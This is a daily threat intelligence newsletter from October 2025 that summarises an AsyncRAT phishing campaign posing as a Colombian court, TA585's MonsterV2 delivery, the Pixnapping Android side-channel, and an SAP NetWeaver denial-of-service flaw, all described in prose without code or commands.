Cyware Daily Threat Intelligence, October 14, 2025

Order in the court! Attackers send Spanish, court-themed phishing emails posing as the Bogotá Municipal Civil Court with an SVG attachment that triggers a multi-stage infection when clicked. The chain drops an HTA and injects AsyncRAT into a trusted Windows process.

TA585 runs its own infrastructure to deliver email attacks and deploy MonsterV2 — a RAT, stealer, and loader. They use the “ClickFix” trick to bait victims into running PowerShell, avoid CIS countries, and sell MonsterV2 on cybercrime forums.

Pixnapping, an Android GPU side-channel attack (linked to "GPU.zip") has been abusing rendering/compression and semi-transparent activities to extract pixel data, stealing 2FA codes, Google Maps timelines, and other sensitive info in under 30 seconds without special permissions.

Top Malware Reported in the Last 24 Hours

AsyncRAT deployment via judicial phishing

Hackers use court-themed phishing emails in Spanish, impersonating the Bogotá Municipal Civil Court, to target Colombian users. The phishing email includes an SVG attachment that triggers a multi-stage infection chain when clicked, leading to the download of a malicious HTA file. The HTA file executes a Visual Basic script that downloads and decodes additional payloads, ultimately injecting AsyncRAT into a trusted Windows process. AsyncRAT gathers system details, avoids detection using anti-analysis techniques, and exfiltrates data via a TLS-encrypted channel.

TA585 uses noveliweb-Injection to deliver MonsterV2 malware

TA585 is a newly identified threat actor managing its attack chain, including infrastructure, email delivery, and malware installation. MonsterV2 malware acts as a RAT, stealer, and loader, capable of exfiltrating sensitive data, enabling remote desktop access, and executing additional payloads. TA585 avoids infecting systems in Commonwealth of Independent States (CIS) countries and uses MonsterV2, sold on cybercriminal forums. TA585 employs the ClickFix technique, which involves malicious scripts prompting users to execute PowerShell commands for malware delivery. 

Top Vulnerabilities Reported in the Last 24 Hours

Pixnapping vulnerability steals 2FA Codes

A vulnerability called "Pixnapping" can exploit Android devices from Google and Samsung to steal sensitive data like 2FA codes and Google Maps timelines without user knowledge. Pixnapping bypasses browser mitigations and targets Android APIs and hardware side-channels, allowing malicious apps to capture 2FA codes in under 30 seconds. The attack leverages Android's rendering pipeline and semi-transparent activities to extract pixel data from victim apps, even without special permissions. The vulnerability is linked to a side-channel known as GPU.zip, which exploits GPU compression features combined with Android's window blur API. 

SAP NetWeaver vulnerability enables DoS attacks

A newly disclosed vulnerability (CVE-2025-42902) in SAP NetWeaver AS ABAP and ABAP Platform allows unauthenticated attackers to crash server processes by sending corrupted SAP Logon or Assertion Tickets. Rated as Medium severity with a CVSS score of 5.3, the flaw stems from a NULL pointer dereference, causing memory corruption and DoS conditions. SAP has released patches and advisory notes to address the issue, urging administrators to apply updates immediately.